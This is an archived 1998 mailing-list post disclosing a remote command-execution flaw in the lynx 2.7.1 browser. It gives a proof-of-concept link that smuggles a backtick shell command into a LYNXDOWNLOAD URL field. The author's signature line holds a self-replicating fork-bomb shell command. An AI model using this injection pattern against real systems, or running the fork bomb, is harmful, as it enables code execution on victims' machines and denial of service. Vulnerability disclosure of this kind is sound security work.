Very, very ugly remote lynx 2.7.1 hole

From: Michal Zalewski (lcamtufat_private)
Date: Tue Mar 17 1998 - 07:27:29 PST

  • Next message: Michal Zalewski: "Another day, another race - lynx 2.7.1"

    While poking around lynx protocol handling routines, I found this very
    big, ugly remote hole:
    <a href="LYNXDOWNLOAD://Method=-1/File=`touch%20UGLY_BUG`/SugFile=test">
    It allows remote execution of any code on viewer's machine. Also, by
    setting 'Method' field to 0 or more, you may crash lynx, but it isn't so
    exciting as above URL. Also, it's possible to parse /dev/zero as 'File',
    also not funny.
    Michal Zalewski [tel 9690] | finger 4 PGP [lcamtufat_private]
    Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deustch]
    =--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=

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